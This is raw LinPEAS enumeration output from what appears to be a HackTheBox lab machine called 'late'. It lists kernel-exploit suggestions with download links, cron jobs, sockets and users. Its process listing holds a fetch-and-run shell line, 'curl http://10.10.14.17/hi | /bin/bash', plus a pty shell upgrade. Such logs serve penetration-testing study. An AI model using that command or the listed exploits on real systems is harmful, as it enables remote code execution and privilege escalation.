Linpeas Output
ââââââââââââââ
âââââââ ââââââââ
âââââââ ââââââââââââââââââââ ââââ
ââââ â ââââââââââââââââââââââââââââââ ââââââ
â âââââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââââââââââ âââââ âââââââââââââââââ
âââââââââââ ââââââ ââââââ â
ââââââ ââââââââ ââââ
ââ âââ âââââ âââ
ââ ââââââââââââ ââ
â ââ âââââââââââââââââââââââââââââ ââ
â âââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââââ ââââ
âââââ âââââ ââââââ ââââ
ââââ âââââ âââââ â ââ
âââââ âââââ âââââââ âââââ âââââ
ââââââ âââââââ âââââââ âââââââ âââââ
ââââââââââââââ â âââââââââââââââ
âââââââââââââ ââââââââââââââ
âââââââââââ ââââââââââââââ
ââââââââââââââââââ ââââââââââââââââââââ
âââââ ââââââââââââââââââââââââââ âââââââââââââ
ââââââââ ââââââââââ ââââââââ
âââââââââââââââââââââââ
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Get latest LinPEAS : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
âââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââĢ Basic information â âââââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââ
OS: Linux version 4.15.0-175-generic (buildd@lcy02-amd64-034) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #184-Ubuntu SMP Thu Mar 24 17:48:36 UTC 2022
User & Groups: uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
Hostname: late
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe
DONE
ââââââââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââĢ System Information â ââââââââââââââââââââââââââââââââââââââââ
ââââââââââââââââââââââ
ââââââââââââĢ Operative system
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.15.0-175-generic (buildd@lcy02-amd64-034) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #184-Ubuntu SMP Thu Mar 24 17:48:36 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic
ââââââââââââĢ Sudo version
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
ââââââââââââĢ CVEs Check
./linpeas.sh: 1192: ./linpeas.sh: [[: not found
./linpeas.sh: 1192: ./linpeas.sh: rpm: not found
./linpeas.sh: 1192: ./linpeas.sh: 0: not found
./linpeas.sh: 1202: ./linpeas.sh: [[: not found
ââââââââââââĢ PATH
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ââââââââââââĢ Date & uptime
Fri Apr 29 20:18:39 UTC 2022
20:18:39 up 8:40, 0 users, load average: 0.32, 0.11, 0.03
ââââââââââââĢ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3
ââââââââââââĢ Unmounted file-system?
â Check if you can mount unmounted devices
/dev/disk/by-id/dm-uuid-LVM-K9sID5HS0BioNF3Nf78PEj64ogIbQQFYkm5vYyFQujYnKhx8wEg3NbTLdurdYyxv / ext4 defaults 0 0
/dev/disk/by-uuid/9c799abd-020e-4aff-bd5d-ca3e16b032cb /boot ext4 defaults 0 0
/dev/mapper/ubuntu--vg-swap none swap sw 0 0
ââââââââââââĢ Environment
â Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
USER=svc_acc
SHLVL=3
HOME=/home/svc_acc
OLDPWD=/home/svc_acc/app
LOGNAME=svc_acc
JOURNAL_STREAM=9:21747
_=./linpeas.sh
SERVER_SOFTWARE=gunicorn/20.1.0
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=becce0d27d5d457e9b4347711884ce9c
LANG=en_US.UTF-8
HISTSIZE=0
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/svc_acc
HISTFILE=/dev/null
ââââââââââââĢ Searching Signature verification failed in dmesg
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
ââââââââââââĢ Executing Linux Exploit Suggester
â https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2018-18955] subuid_shell
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
Exposure: probable
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
Comments: CONFIG_USER_NS needs to be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
ââââââââââââĢ Executing Linux Exploit Suggester 2
â https://github.com/jondonas/linux-exploit-suggester-2
ââââââââââââĢ Protections
ââĢ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
ââĢ grsecurity present? ............ grsecurity Not Found
ââĢ PaX bins present? .............. PaX Not Found
ââĢ Execshield enabled? ............ Execshield Not Found
ââĢ SELinux enabled? ............... sestatus Not Found
ââĢ Is ASLR enabled? ............... Yes
ââĢ Printer? ....................... No
ââĢ Is this a virtual machine? ..... Yes (vmware)
âââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââââââĢ Container â âââââââââââââââââââââââââââââââââââââââââââââ
âââââââââââââ
ââââââââââââĢ Container related tools present
/usr/bin/lxc
ââââââââââââĢ Container details
ââĢ Is this a container? ........... No
ââĢ Any running containers? ........ No
ââââââââââââââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââââââââĢ Processes, Crons, Timers, Services and Sockets â ââââââââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââĢ Cleaned processes
â Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root 1 0.0 0.4 159720 8748 ? Ss 11:38 0:03 /sbin/init maybe-ubiquity
root 531 0.0 0.5 95536 12088 ? S<s 11:38 0:01 /lib/systemd/systemd-journald
root 538 0.0 0.0 105912 1956 ? Ss 11:38 0:00 /sbin/lvmetad -f
root 561 0.0 0.2 46608 5196 ? Ss 11:38 0:00 /lib/systemd/systemd-udevd
systemd+ 619 0.0 0.1 145972 3220 ? Ssl 11:38 0:02 /lib/systemd/systemd-timesyncd
ââ(Caps) 0x0000000002000000=cap_sys_time
root 706 0.0 0.4 89872 9932 ? Ss 11:38 0:00 /usr/bin/VGAuthService
root 708 0.0 0.3 225736 7656 ? S<sl 11:38 0:28 /usr/bin/vmtoolsd
systemd+ 823 0.0 0.2 71732 5136 ? Ss 11:38 0:00 /lib/systemd/systemd-networkd
ââ(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 852 0.0 0.2 70500 5128 ? Ss 11:38 0:01 /lib/systemd/systemd-resolved
root 989 0.0 0.3 286260 6896 ? Ssl 11:38 0:00 /usr/lib/accountsservice/accounts-daemon[0m
avahi 1026 0.0 0.0 47084 336 ? S 11:38 0:00 _ avahi-daemon: chroot helper
root 998 0.0 0.4 434332 9656 ? Ssl 11:38 0:00 /usr/sbin/ModemManager --filter-policy=strict
root 1032 0.0 0.8 169104 17232 ? Ssl 11:38 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
daemon[0m 1033 0.0 0.1 28340 2500 ? Ss 11:38 0:00 /usr/sbin/atd -f
root 1036 0.0 0.1 30036 3292 ? Ss 11:38 0:00 /usr/sbin/cron -f
message+ 1038 0.0 0.2 50368 4740 ? Ss 11:38 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
ââ(Caps) 0x0000000020000000=cap_audit_write
root 1084 0.0 0.2 45240 5412 ? Ss 11:38 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root 1091 0.0 0.1 383336 2372 ? Ssl 11:38 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 1099 0.0 0.1 110556 2072 ? Ssl 11:38 0:01 /usr/sbin/irqbalance --foreground
root 1100 0.0 0.2 70476 5880 ? Ss 11:38 0:00 /lib/systemd/systemd-logind
syslog 1101 0.0 0.2 263044 4548 ? Ssl 11:38 0:00 /usr/sbin/rsyslogd -n
root 1102 0.0 0.7 405500 16092 ? Ssl 11:38 0:04 /usr/sbin/NetworkManager --no-daemon[0m
root 1131 0.0 0.3 288888 6608 ? Ssl 11:38 0:00 /usr/lib/policykit-1/polkitd --no-debug
svc_acc 1212 0.0 1.1 60704 22788 ? Ss 11:38 0:06 /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 1516 0.0 1.7 107036 36316 ? S 11:38 0:07 _ /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 7818 0.0 1.5 101340 32648 ? S 19:17 0:00 _ /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 8716 0.2 1.5 101084 32344 ? S 20:17 0:00 _ /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
root 1242 0.0 0.0 141720 1576 ? Ss 11:38 0:00 nginx: master process /usr/sbin/nginx -g daemon[0m on; master_process on;
www-data 1243 0.1 0.3 144016 7072 ? S 11:38 0:37 _ nginx: worker process
www-data 1244 0.0 0.3 144016 7072 ? S 11:38 0:11 _ nginx: worker process
root 1325 0.0 0.3 72308 6628 ? Ss 11:38 0:00 /usr/sbin/sshd -D
root 1330 0.0 0.0 14896 1968 tty1 Ss+ 11:38 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 1483 0.0 0.2 124840 4512 ? Ss 11:38 0:01 sendmail: MTA: accepting connections
svc_acc 8678 0.0 0.0 4636 816 ? S 20:16 0:00 /bin/sh -c curl http://10.10.14.17/hi | /bin/bash
svc_acc 8680 0.0 0.1 11600 3244 ? S 20:16 0:00 _ /bin/bash
svc_acc 8681 0.0 0.2 21244 4904 ? S 20:16 0:00 _ /bin/bash -i
svc_acc 8705 0.0 0.4 39096 9740 ? S 20:17 0:00 _ python3 -c import pty;pty.spawn("/bin/bash");
svc_acc 8706 0.0 0.2 21476 5364 pts/0 Ss 20:17 0:00 _ /bin/bash
svc_acc 8994 0.5 0.1 5744 2892 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
svc_acc 12110 0.0 0.0 5744 1136 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
svc_acc 12114 0.0 0.1 38704 3980 pts/0 R+ 20:18 0:00 | _ ps fauxwww
svc_acc 12113 0.0 0.0 5744 1136 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
ââââââââââââĢ Binary processes permissions (non 'root root' and not belonging to current user)
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
ââââââââââââĢ Files opened by processes belonging to other users
â This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ââââââââââââĢ Processes with credentials in memory (root req)
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
ââââââââââââĢ Cron jobs
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 32
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 589 Jan 14 2020 mdadm
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest
-rw-r--r-- 1 root root 2466 Jan 14 10:20 sendmail
/etc/cron.daily:
total 76
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rwxr-xr-x 1 root root 376 Nov 11 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 384 Dec 12 2012 cracklib-runtime
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 3302 Jan 13 2018 sendmail
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 403 Aug 23 2021 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
ââââââââââââĢ Systemd PATH
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ââââââââââââĢ Analyzing .service files
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
ââââââââââââĢ System timers
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Fri 2022-04-29 22:30:43 UTC 2h 11min left Fri 2022-04-29 11:54:35 UTC 8h ago motd-news.timer motd-news.service
Sat 2022-04-30 06:42:42 UTC 10h left Fri 2022-04-29 11:38:37 UTC 8h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sat 2022-04-30 07:06:08 UTC 10h left Fri 2022-04-29 19:30:59 UTC 47min ago apt-daily.timer apt-daily.service
Sat 2022-04-30 11:53:43 UTC 15h left Fri 2022-04-29 11:53:43 UTC 8h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2022-05-02 00:00:00 UTC 2 days left Fri 2022-04-29 11:38:37 UTC 8h ago fstrim.timer fstrim.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
ââââââââââââĢ Analyzing .timer files
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
ââââââââââââĢ Analyzing .socket files
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/etc/systemd/system/sockets.target.wants/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
ââââââââââââĢ Unix Sockets Listening
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/run/acpid.socket
ââ(Read Write)
/run/avahi-daemon/socket
ââ(Read Write)
/run/dbus/system_bus_socket
ââ(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/sendmail/mta/smcontrol
/run/systemd/journal/dev-log
ââ(Read Write)
/run/systemd/journal/socket
ââ(Read Write)
/run/systemd/journal/stdout
ââ(Read Write)
/run/systemd/journal/syslog
ââ(Read Write)
/run/systemd/notify
ââ(Read Write)
/run/systemd/private
ââ(Read Write)
/run/udev/control
/run/uuidd/request
ââ(Read Write)
/run/vmware/guestServicePipe
ââ(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
ââ(Read Write)
/var/run/sendmail/mta/smcontrol
/var/run/vmware/guestServicePipe
ââ(Read Write)
ââââââââââââĢ D-Bus config files
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf ( <policy user="avahi">)
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf ( <policy group="netdev">)
Possible weak user policy found on /etc/dbus-1/system.d/bluetooth.conf ( <policy group="bluetooth">
<policy group="lp">)
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">)
Possible weak user policy found on /etc/dbus-1/system.d/net.hadess.SensorProxy.conf ( <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.ColorManager.conf ( <policy user="colord">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.GeoClue2.Agent.conf ( <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.GeoClue2.conf ( <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.NetworkManager.conf ( <policy user="whoopsie">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.RealtimeKit1.conf ( <policy user="rtkit">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
Possible weak user policy found on /etc/dbus-1/system.d/org.opensuse.CupsPkHelper.Mechanism.conf ( <policy user="cups-pk-helper">)
Possible weak user policy found on /etc/dbus-1/system.d/pulseaudio-system.conf ( <policy user="pulse">)
Possible weak user policy found on /etc/dbus-1/system.d/wpa_supplicant.conf ( <policy group="netdev">)
ââââââââââââĢ D-Bus Service Objects list
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1 systemd root :1.0 init.scope - -
:1.1 852 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
:1.10 1102 NetworkManager root :1.10 NetworkManager.service - -
:1.11 1032 networkd-dispat root :1.11 networkd-dispatcher.seâĶce - -
:1.115 15144 busctl svc_acc :1.115 web-app.service - -
:1.2 823 systemd-network systemd-network :1.2 systemd-networkd.service - -
:1.3 998 ModemManager root :1.3 ModemManager.service - -
:1.4 995 avahi-daemon avahi :1.4 avahi-daemon.service - -
:1.6 989 accounts-daemon[0m root :1.6 accounts-daemon.service - -
:1.7 1084 wpa_supplicant root :1.7 wpa_supplicant.service - -
:1.8 1100 systemd-logind root :1.8 systemd-logind.service - -
:1.9 1131 polkitd root :1.9 polkit.service - -
com.ubuntu.LanguageSelector - - - (activatable) - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
com.ubuntu.SystemService - - - (activatable) - -
com.ubuntu.WhoopsiePreferences - - - (activatable) - -
fi.epitest.hostap.WPASupplicant 1084 wpa_supplicant root :1.7 wpa_supplicant.service - -
fi.w1.wpa_supplicant1 1084 wpa_supplicant root :1.7 wpa_supplicant.service - -
org.bluez - - - (activatable) - -
org.debian.apt - - - (activatable) - -
org.freedesktop.Accounts 989 accounts-daemon[0m root :1.6 accounts-daemon.service - -
org.freedesktop.Avahi 995 avahi-daemon avahi :1.4 avahi-daemon.service - -
org.freedesktop.ColorManager - - - (activatable) - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.GeoClue2 - - - (activatable) - -
org.freedesktop.ModemManager1 998 ModemManager root :1.3 ModemManager.service - -
org.freedesktop.NetworkManager 1102 NetworkManager root :1.10 NetworkManager.service - -
org.freedesktop.PackageKit - - - (activatable) - -
org.freedesktop.PolicyKit1 1131 polkitd root :1.9 polkit.service - -
org.freedesktop.RealtimeKit1 - - - (activatable) - -
org.freedesktop.UPower - - - (activatable) - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 1100 systemd-logind root :1.8 systemd-logind.service - -
org.freedesktop.network1 823 systemd-network systemd-network :1.2 systemd-networkd.service - -
org.freedesktop.nm_dispatcher - - - (activatable) - -
org.freedesktop.resolve1 852 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.0 init.scope - -
org.freedesktop.thermald - - - (activatable) - -
org.freedesktop.timedate1 - - - (activatable) - -
org.opensuse.CupsPkHelper.Mechanism - - - (activatable) - -
âââââââââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââĢ Network Information â ââââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââââ
ââââââââââââĢ Hostname, hosts and DNS
late
127.0.0.1 localhost.localdomain localhost late late.htb
127.0.0.1 late
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
1.1.1.1
localdomain
ââââââââââââĢ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.156 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:6da0 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:6da0 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:6d:a0 txqueuelen 1000 (Ethernet)
RX packets 494481 bytes 85527453 (85.5 MB)
RX errors 0 dropped 155 overruns 0 frame 0
TX packets 450072 bytes 170915293 (170.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 85403 bytes 20924303 (20.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 85403 bytes 20924303 (20.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ââââââââââââĢ Active Ports
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN 1212/python3
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
ââââââââââââĢ Can I sniff with tcpdump?
No
âââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââĢ Users Information â âââââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââ
ââââââââââââĢ My user
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#users
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
ââââââââââââĢ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
ââââââââââââĢ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
ââââââââââââĢ Checking sudo tokens
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
ââââââââââââĢ Checking Pkexec policy
â https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
ââââââââââââĢ Superusers
root:x:0:0:root:/root:/bin/bash
ââââââââââââĢ Users with console
root:x:0:0:root:/root:/bin/bash
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
